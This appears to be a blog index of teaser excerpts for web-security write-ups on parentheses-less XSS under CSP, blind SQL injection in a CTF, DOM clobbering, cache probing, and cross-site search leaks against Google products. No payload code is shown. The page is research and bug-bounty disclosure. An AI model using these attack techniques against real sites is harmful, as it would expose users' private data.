In the past years, an interesting XSS vector was put on a table by some researchers, and that is Parentheses-less XSS.
It’s not a mystery that there are known payloads that will execute arbitrary XSS with limited charsets. One of the simplest payloads out there is
But there was a gap in the research that I attempted to fill and that is
Executing arbitrary parentheses-less XSS against strict Content-Security-Policy’ies (CSP)
As a result of my research, I created an XSS challenge…
As for the sake of exercising, I looked up a few web challenges on TetCTF and noticed an interesting one — ”Secure System”. When solving the challenge, I explored many SQL Injection techniques that you will probably not find in any tutorials. Enjoy reading!
The challenge was to craft a Blind SQL Injection payload without using:
Although the filter was way more complex, these were the hardest obstacles to overcome.
In my previous write-up about DOM Clobbering, I presented a solution to an XSS challenge that involved overriding a CONFIG variable via the mentioned technique. I recommend checking the article out since I will not be explaining the basics of the method but rather diving deeper into different but helpful techniques.
Three main functionalities were embedded into the website:
A couple of months back, I took a part in researching dangers that come from Cache Probing Attack and new ways to exploit the vulnerability across multiple platforms. I was able to prove that it was possible to leak significant information about the user on several Google products such as their private emails, tokens, credit card numbers, phone numbers, bookmarks, private notes and much more.
This is a write-up for an XSS Challenge that popped out on Twitter recently. In this article, I will talk through three different approaches that one could take to solve the challenge, including the shortest among the submitted solutions. The latter resulted in a surprising discovery of how HTML is parsed.
If you are familiar with the challenge details and are only interested in knowing the solutions, I recommend scrolling down to the ‘CSP Path bypass’ section.
It was supposed to be a mini-article but turned out to be an at least medium-size text. Enjoy reading! :)
The XSS-Auditor is a tool implemented by various browsers whose intention is to detect any reflected XSS (Cross-site scripting) vectors and block/filter each of them.
The XSS Auditor runs during the HTML parsing phase and attempts to find reflections from the request to the response body. It does not attempt to mitigate Stored or DOM-based XSS attacks.
If a possible reflection has been found, Chrome may ignore (neuter) the specific script, or it may block the page from loading with an ERR_BLOCKED_BY_XSS_AUDITOR error page.
The original design http://www.collinjackson.com/research/xssauditor.pdf is the best place to start. …
Google Search has been going through a lot lately due to the outstanding XSS finding that was done by Masato Kinugawa. In this brief article I wanted to share with you, maybe not as exciting as the finding mentioned above, but for sure a very cool bug that I discovered when sniffing around Google Search lately.
The title with the intro image at the side should already reveal what the vulnerability that I found is about. It’s manipulation of one’s autosuggestion list that pops out when they’re searching for phrases using the Google Search website.
Recently, I have been participating in open Bug Bounties programs, mostly focusing on Cross-Site Search Attacks (XS-Search). This writeup is first of many to come demonstrating a successful cross-site search, here on the books.google.com website. The idea behind the attack comes from the Filemanager task that was presented during 35c3ctf and which is based on abuse of Chromium XSS Auditor. By exploiting that vulnerability the attacker could exfiltrate user’s private book collections along with the reading history.
When inspecting the source code of the page, I noticed interesting differences between code sources. One of those…
When doing my usual Bug Bounty research routine, I found an interesting behavior that occurred on a popular website, let’s say censored.com. Depending on whether the user was authorized to display the website two completely different pages were being shown. One, with
content-type:text/html;charset=utf-8 HTTP header, and the second, without Content-Type header at all, which in that case becomes
text/plain by default. So I’ve asked myself: Is there a clever way to differentiate between these two responses? If so, could this be generalized to all websites? What threats does it pose?
Let’s start with the threats that differentiating between responses mentioned…